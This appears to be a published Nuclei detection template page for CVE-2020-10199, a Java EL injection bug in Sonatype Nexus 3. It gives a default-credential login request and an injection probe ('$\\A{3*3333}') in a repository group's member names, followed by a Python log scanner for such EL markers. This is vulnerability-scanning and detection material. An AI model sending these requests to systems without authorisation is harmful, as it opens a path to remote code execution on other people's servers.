Sonatype Nexus Repository Manager 3 - Remote Code Execution
ID: CVE-2020-10199
Severity: high
Author: rootxharsh,iamnoooob,pdresearch
Tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev
Description
Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection
YAML Source
id: CVE-2020-10199

info:
  name: Sonatype Nexus Repository Manager 3 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3.
  reference:
    - https://twitter.com/iamnoooob/status/1246182773427240967
    - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10199
    - http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html
    - https://cwe.mitre.org/data/definitions/917.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-10199
    cwe-id: CWE-917
    epss-score: 0.97327
    epss-percentile: 0.99883
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sonatype
    product: nexus
    fofa-query: title="nexus repository manager"
  tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev
variables:
  username: admin
  password: admin123

http:
  - raw:
      - |
        POST /service/rapture/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{base64(username)}}&password={{base64(password)}}
      - |
        POST /service/rest/beta/repositories/bower/group HTTP/1.1
        Host: {{Hostname}}
        NX-ANTI-CSRF-TOKEN: 1
        Cookie: NX-ANTI-CSRF-TOKEN=1
        Content-Type: application/json

        {"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Member repository does not exist: A9999"

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100bfcf88b31ee91c0be978c691e2dbf4209043b142319d43b1fa44c1e448e458df0220079be4df7239082184c88b344e339c14b4ac4fc8fee19509115dcda3999ca72d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-10199.yaml"
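
To check whether a request shaped like the template's second request has already reached a Nexus instance, the following added example (not part of the template or of the Nuclei project) scans captured request records for EL expression markers in group.memberNames. The JSON-lines log schema (src, method, path, body), the sample records, the function names and the widening of "bower" to any repository format are assumptions made for illustration.

```python
import json
import re

# Template's second request path; accepting any format segment (not only "bower") is an assumption.
GROUP_API = re.compile(r"^/service/rest/beta/repositories/[^/]+/group$")
# Matches "${", "#{" and the backslash-escaped "$\A{" form used by the template's probe.
EL_MARKER = re.compile(r"[$#](?:\\\w)?\{")

def suspicious_members(body):
    """Return the group.memberNames entries that carry an EL expression marker."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []  # missing or non-JSON bodies cannot match this request shape
    group = doc.get("group") if isinstance(doc, dict) else None
    members = group.get("memberNames") if isinstance(group, dict) else None
    if not isinstance(members, list):
        return []
    return [m for m in members if isinstance(m, str) and EL_MARKER.search(m)]

def scan(log_lines):
    """Return (source, path, hits) for each POST to a group endpoint with EL markers."""
    findings = []
    for line in log_lines:
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # skip malformed records instead of aborting the scan
        if not isinstance(rec, dict) or rec.get("method") != "POST":
            continue
        path = str(rec.get("path", "")).split("?", 1)[0]
        if not GROUP_API.match(path):
            continue
        hits = suspicious_members(rec.get("body"))
        if hits:
            findings.append((rec.get("src"), path, hits))
    return findings

# Constructed records in an assumed JSON-lines schema (src, method, path, body).
def _rec(src, method, path, body):
    return json.dumps({"src": src, "method": method, "path": path, "body": json.dumps(body)})

GROUP = "/service/rest/beta/repositories/bower/group"
SAMPLE_LOG = [
    _rec("198.51.100.7", "POST", GROUP, {"name": "internal", "group": {"memberNames": ["$\\A{3*3333}"]}}),
    _rec("192.0.2.10", "POST", GROUP, {"name": "bower-all", "group": {"memberNames": ["bower-hosted", "bower-proxy"]}}),
    _rec("192.0.2.10", "GET", "/service/rest/v1/status", {}),
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit only shows that an expression was submitted; whether it was evaluated depends on the server version, so pair findings with a check that the instance runs 3.21.2 or later.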